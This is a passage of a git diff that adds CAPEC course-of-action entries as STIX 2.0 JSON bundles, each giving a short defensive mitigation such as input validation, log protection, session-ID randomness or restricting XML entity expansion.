"bundle", + "id": "bundle--6edc211a-e2a8-4326-ace9-68ef5bc9ca40", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-9", + "description": "Protect your log file from unauthorized modification and log forging.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--23e84cfc-4f98-403a-a6a5-9e1f288a238a.json b/capec/course-of-action/course-of-action--23e84cfc-4f98-403a-a6a5-9e1f288a238a.json new file mode 100644 index 0000000000..c75b652ab1 --- /dev/null +++ b/capec/course-of-action/course-of-action--23e84cfc-4f98-403a-a6a5-9e1f288a238a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--05eae472-76eb-4276-bd12-99a98b87f270", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--23e84cfc-4f98-403a-a6a5-9e1f288a238a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-193-2", + "description": "Implementation: Make use of indirect references passed in URL parameters instead of file names", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--24697e41-07a0-4c75-b84d-68c6bd2a8b8f.json b/capec/course-of-action/course-of-action--24697e41-07a0-4c75-b84d-68c6bd2a8b8f.json new file mode 100644 index 0000000000..d3e1142700 --- /dev/null +++ b/capec/course-of-action/course-of-action--24697e41-07a0-4c75-b84d-68c6bd2a8b8f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--810a1ed6-249c-45b1-aa7f-6d4f6671d7a4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--24697e41-07a0-4c75-b84d-68c6bd2a8b8f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-502-0", + "description": "To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--24787b8e-b486-41f2-b8f3-1cd9d79a449a.json b/capec/course-of-action/course-of-action--24787b8e-b486-41f2-b8f3-1cd9d79a449a.json new file mode 100644 index 0000000000..191a9e3faf --- /dev/null +++ b/capec/course-of-action/course-of-action--24787b8e-b486-41f2-b8f3-1cd9d79a449a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--584cfc8f-7bf3-4e5e-adf9-384539f73fec", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--24787b8e-b486-41f2-b8f3-1cd9d79a449a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-2", + "description": "Server side developers should not proxy content via XHR or other means. If a HTTP proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d.json b/capec/course-of-action/course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d.json new file mode 100644 index 0000000000..08dec6de34 --- /dev/null +++ b/capec/course-of-action/course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4cdb676a-ca68-47a8-a61b-91f8c737be90", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-1", + "description": "Validate all untrusted data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--24d6271d-29ca-41d8-baf7-e74c5a8d438c.json b/capec/course-of-action/course-of-action--24d6271d-29ca-41d8-baf7-e74c5a8d438c.json new file mode 100644 index 0000000000..5e5bcd1b83 --- /dev/null +++ b/capec/course-of-action/course-of-action--24d6271d-29ca-41d8-baf7-e74c5a8d438c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f814905c-160e-4355-ac4d-65cdbd74ffd2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--24d6271d-29ca-41d8-baf7-e74c5a8d438c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-3-2", + "description": "Take an iterative approach to input validation (defense in depth).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63.json b/capec/course-of-action/course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63.json new file mode 100644 index 0000000000..6e9d3c5189 --- /dev/null +++ b/capec/course-of-action/course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--47fb865a-52f8-48bc-a828-83f04aafcc68", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-75-1", + "description": "Design: Backup copies of all configuration files", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22.json b/capec/course-of-action/course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22.json new file mode 100644 index 0000000000..0a92e1633b --- /dev/null +++ b/capec/course-of-action/course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--36f4ece3-7bcb-450f-8b26-58ea3142281f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-203-1", + "description": "Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227.json b/capec/course-of-action/course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227.json new file mode 100644 index 0000000000..1a5509ddb6 --- /dev/null +++ b/capec/course-of-action/course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bc9a607b-420f-4941-a542-ce710073b636", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-588-2", + "description": "Ensure that all user-supplied input is validated before use.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--26e81028-3a75-4321-94a2-71630c84ef29.json b/capec/course-of-action/course-of-action--26e81028-3a75-4321-94a2-71630c84ef29.json new file mode 100644 index 0000000000..85046e6186 --- /dev/null +++ b/capec/course-of-action/course-of-action--26e81028-3a75-4321-94a2-71630c84ef29.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--02d69578-948b-4ec2-9f3a-40b39476d4b2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--26e81028-3a75-4321-94a2-71630c84ef29", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-215-0", + "description": "Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47.json b/capec/course-of-action/course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47.json new file mode 100644 index 0000000000..e8fd9ca1d3 --- /dev/null +++ b/capec/course-of-action/course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--33ffd116-eaae-41b5-a51a-b35b600959a9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-26-3", + "description": "Use static analysis tools to find race conditions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--274ded76-0511-4a3b-8d7e-89a49c0c160e.json b/capec/course-of-action/course-of-action--274ded76-0511-4a3b-8d7e-89a49c0c160e.json new file mode 100644 index 0000000000..c604ed40a0 --- /dev/null +++ b/capec/course-of-action/course-of-action--274ded76-0511-4a3b-8d7e-89a49c0c160e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c0be0165-e0ef-4776-bb28-c61f95755c96", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--274ded76-0511-4a3b-8d7e-89a49c0c160e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-472-0", + "description": "Configuration: Disable Java Script in the browser", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e.json b/capec/course-of-action/course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e.json new file mode 100644 index 0000000000..86f3580889 --- /dev/null +++ b/capec/course-of-action/course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--29f1d49c-5731-42dc-8689-99d5f04c0122", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-230-3", + "description": "Validate XML against a valid schema or DTD prior to parsing.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--280047d5-2fea-4418-8952-f13e43540cdf.json b/capec/course-of-action/course-of-action--280047d5-2fea-4418-8952-f13e43540cdf.json new file mode 100644 index 0000000000..966ed15c45 --- /dev/null +++ b/capec/course-of-action/course-of-action--280047d5-2fea-4418-8952-f13e43540cdf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6efed50c-817f-4c0c-ac83-fc9198295891", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--280047d5-2fea-4418-8952-f13e43540cdf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-242-0", + "description": "Utilize strict type, character, and encoding enforcement", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--28d4d037-94a9-4035-9477-678d3e0be043.json b/capec/course-of-action/course-of-action--28d4d037-94a9-4035-9477-678d3e0be043.json new file mode 100644 index 0000000000..1cff42c376 --- /dev/null +++ b/capec/course-of-action/course-of-action--28d4d037-94a9-4035-9477-678d3e0be043.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e2c717d0-cb43-497a-95a2-653ffca64bc3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--28d4d037-94a9-4035-9477-678d3e0be043", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-61-2", + "description": "Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--28d662f7-7950-46fd-9291-865c8a7da492.json b/capec/course-of-action/course-of-action--28d662f7-7950-46fd-9291-865c8a7da492.json new file mode 100644 index 0000000000..e51f932ff0 --- /dev/null +++ b/capec/course-of-action/course-of-action--28d662f7-7950-46fd-9291-865c8a7da492.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2650c8e7-0aba-4bf2-9627-27ba408e92cb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--28d662f7-7950-46fd-9291-865c8a7da492", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-6", + "description": "Disable scripting languages such as JavaScript in browser", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--29a42808-e171-48df-affd-22dfaa3718b1.json b/capec/course-of-action/course-of-action--29a42808-e171-48df-affd-22dfaa3718b1.json new file mode 100644 index 0000000000..3c86281566 --- /dev/null +++ b/capec/course-of-action/course-of-action--29a42808-e171-48df-affd-22dfaa3718b1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2a87a8cf-902e-4302-bf2f-edcd3e1b5eee", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--29a42808-e171-48df-affd-22dfaa3718b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-139-3", + "description": "Implementation: Prefer working without user input when using file system calls", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498.json b/capec/course-of-action/course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498.json new file mode 100644 index 0000000000..8b87ee108b --- /dev/null +++ b/capec/course-of-action/course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--acf0488a-ca6c-482d-8c67-25762b4ac0f1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-92-1", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--29d228d4-14b2-4cb3-a702-37b58b13d7bd.json b/capec/course-of-action/course-of-action--29d228d4-14b2-4cb3-a702-37b58b13d7bd.json new file mode 100644 index 0000000000..e04f9023e5 --- /dev/null +++ b/capec/course-of-action/course-of-action--29d228d4-14b2-4cb3-a702-37b58b13d7bd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1fea6715-f168-4f17-a05a-4b3d8f1cb14e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--29d228d4-14b2-4cb3-a702-37b58b13d7bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-35-4", + "description": "Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2a257365-86f5-44ce-84f9-ee47d9d88243.json b/capec/course-of-action/course-of-action--2a257365-86f5-44ce-84f9-ee47d9d88243.json new file mode 100644 index 0000000000..725bb285f5 --- /dev/null +++ b/capec/course-of-action/course-of-action--2a257365-86f5-44ce-84f9-ee47d9d88243.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b3200647-5ae5-4829-81a2-464ea296c676", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2a257365-86f5-44ce-84f9-ee47d9d88243", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-5", + "description": "Perform output validation for all remote content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26.json b/capec/course-of-action/course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26.json new file mode 100644 index 0000000000..b277245261 --- /dev/null +++ b/capec/course-of-action/course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--34fdb85a-1c9a-429e-b1e9-7f8c94c4acb9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-101-2", + "description": "Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2bc98c7e-27ff-46e6-bf2f-cdda5500c8f7.json b/capec/course-of-action/course-of-action--2bc98c7e-27ff-46e6-bf2f-cdda5500c8f7.json new file mode 100644 index 0000000000..db623d1453 --- /dev/null +++ b/capec/course-of-action/course-of-action--2bc98c7e-27ff-46e6-bf2f-cdda5500c8f7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1764d7fc-95aa-405b-b18f-e21f9b7691cf", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2bc98c7e-27ff-46e6-bf2f-cdda5500c8f7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-1", + "description": "Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2bc9caed-efa5-4928-9c7c-99221525dd53.json b/capec/course-of-action/course-of-action--2bc9caed-efa5-4928-9c7c-99221525dd53.json new file mode 100644 index 0000000000..5c75ff5f65 --- /dev/null +++ b/capec/course-of-action/course-of-action--2bc9caed-efa5-4928-9c7c-99221525dd53.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--573abb80-236c-4b9e-bda1-7ffa57c7fee7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2bc9caed-efa5-4928-9c7c-99221525dd53", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-02-06T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-586-0", + "description": "\n Implementation: Validate object before deserialization process\n Design: Limit which types can be deserialized.\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Whitelist acceptable classes.\n Implementation: Keep session state on the server, when possible.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4.json b/capec/course-of-action/course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4.json new file mode 100644 index 0000000000..c2f7bef848 --- /dev/null +++ b/capec/course-of-action/course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--25d87f48-a5f2-4890-8651-f8436ba67268", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-60-3", + "description": "Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb.json b/capec/course-of-action/course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb.json new file mode 100644 index 0000000000..624dfd3e66 --- /dev/null +++ b/capec/course-of-action/course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fb362d5e-e233-4ca2-b6d6-32c2320e83d4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-631-1", + "description": "Purchase potential SoundSquatted domains and forward to legitimate domain.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75.json b/capec/course-of-action/course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75.json new file mode 100644 index 0000000000..c228a7dc46 --- /dev/null +++ b/capec/course-of-action/course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--abbfbee6-75ae-4ce6-8a3b-7477b2872269", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-87-1", + "description": "Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2cf7aa67-1388-42af-a7a4-91efe4879ba6.json b/capec/course-of-action/course-of-action--2cf7aa67-1388-42af-a7a4-91efe4879ba6.json new file mode 100644 index 0000000000..d4f6bfe534 --- /dev/null +++ b/capec/course-of-action/course-of-action--2cf7aa67-1388-42af-a7a4-91efe4879ba6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--684e4ff5-ad5d-4c79-a9f5-4313ceb5c76e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2cf7aa67-1388-42af-a7a4-91efe4879ba6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-491-0", + "description": "\n Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.\n Implementation: Disable altogether the use of inline DTD schemas in your XML parsing objects. If must use DTD, normalize, filter and white list and parse with methods and routines that will detect entity expansion from untrusted sources.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2d0a4aa4-687f-4549-bc2d-0c2d6b971dff.json b/capec/course-of-action/course-of-action--2d0a4aa4-687f-4549-bc2d-0c2d6b971dff.json new file mode 100644 index 0000000000..47a6d053f2 --- /dev/null +++ b/capec/course-of-action/course-of-action--2d0a4aa4-687f-4549-bc2d-0c2d6b971dff.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--60f7d08a-6b5a-4018-8345-1b95be151fd2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2d0a4aa4-687f-4549-bc2d-0c2d6b971dff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-274-0", + "description": "Design: Ensure that only legitimate HTTP verbs are allowed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c.json b/capec/course-of-action/course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c.json new file mode 100644 index 0000000000..b78550d78a --- /dev/null +++ b/capec/course-of-action/course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e42ef5a6-c0dc-48b2-8dbf-51d7929426b0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-6-2", + "description": "Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No 